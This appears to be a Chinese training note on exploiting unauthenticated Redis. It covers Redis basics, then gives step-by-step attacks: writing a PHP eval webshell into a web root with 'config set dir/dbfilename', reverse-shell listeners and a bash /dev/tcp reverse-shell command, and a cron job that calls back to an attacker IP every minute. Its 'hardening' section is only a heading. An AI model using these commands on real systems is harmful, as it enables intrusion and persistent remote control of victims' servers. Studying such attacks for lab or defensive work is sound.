13-Redis未授权访问漏洞
1、环境准备(文件夹有课件资料+笔记)
1.1 Redis安装 及 命令
Redis 非关系型数据库
key - value
键与值,键是字符串,值支持很多类型,值中还可以是哈希(保存新的键值对)
最常用的命令:set、get
netstat -an|grep 6379 #检查端口
./redis-cli
keys * #查看数据
flushall #清空数据
set xmh 666
get xmh
hset hash 1 a 2 b 3 c 4 d
hget hash 1 #"a"
hget hash 3 #"c"
添加alias变量,在root下的.bashrc
cd ~/.bashrc
source ~/.bashrc
然后打开新的窗口生效!
netstat -an|grep 6379 #检查端口
启动
./redis-server /path/to/redis.conf
停止
redis> shutdown 或 ps -aux | grep redis; kill -9 xxxx
远程连接
./redis-cli -h 192.168.xxx.xxx -p 6379
1.2 持久化机制
我们之前提到的Redis是一个纯内存的数据库,这是Redis访问那么快的根本原因,但是你的数据如果只保存在内存中,一旦服务器断电或重启,内存一清空,你的数据不就也跟着清空了吗?那这样可靠性也太低了吧,所以Redis的作者就想了一个办法,通过Redis持久化机制来保证内存数据不定期的保存到磁盘之中。
两种方式,一种自动(配置文件),一种手动(save)!
打开配置文件的SNAPSHOTTING部分
1.3 动态修改配置
什么叫做Redis动态修改配置呢?本来我们修改Redis配置文件都要在redis.conf这个文件中去修改的,但是redis我们提供了一种动态修改配置的方式。
我们可以通过config set 去修改配置文件,但是修改后的配置文件只在当前会话中生效,也就是说当你重启服务后动态修改的配置都会失效的。
2、提权实战
2.1 webshell提权案例
redis-cli -h 192.168.142.66 -p 6379
config set dir /www/admin/localhost_80/wwwroot
config set dbfilename redis.php
set x "<?php @eval($_POST[wuya]); ?>"
save
使用中国蚁剑连接!
2.2 反弹shell介绍
如果没有监听80端口的HTTP Server 或者 找不到网站根路径呢?
反弹链接
- 内网,私有ip(它可以访问公网,但不能被外网直接连接)
- IP动态变化
- 6379端口不允许入方向访问(防火墙,安全组规则)
- 一句话木马被杀毒软件删除
![]()
怎么实现反弹链接
- 控制机怎么监听一个端口?
- 靶机怎么连接到控制机的端口?
常见监听端口方式(攻击机执行)
常用:nc -lvp 7777、socat TCP-LISTEN:7777 - (Kali)
常见建立反弹连接的方式(靶机执行)
常用:bash -i >& /dev/tcp/192.168.监听机.ip/7777 0>&1
检查防火墙
bash反弹连接 命令解读
总结
一、流程
1、监听端口
2、执行命令,或者上传payload访问,建立连接
二、怎么上传?
1、文件上传漏洞
2、写入文件:MySQL、Redis、CMS
3、文本编辑命令:tee(vulnhub-breach)、test.py(vulnhub-DC9)
三、怎么执行?
访问或者定时任务自动触发
2.5 写入反弹连接定时任务案例
Redis未授权访问漏洞(三)Redis写入反弹连接定时任务
crontab定时任务命令、以及 cron表达式
首先远程连接Redis服务器
输入:set x "\n* * * * * bash -i >& /dev/tcp/192.168.125.129/7777 0>&1\n"
这里使用了Cron表达式,表示每隔一分钟执行一次连接的命令
修改数据文件位置 且 修改文件名为当前用户名(即为当前用户创建定时任务)
config set dir /var/spool/cron/
config set dbfilename root
save
2.4 SSH Key getshell案例
Redis其他利用漏洞
3、加固防御
浙公网安备 33010602011771号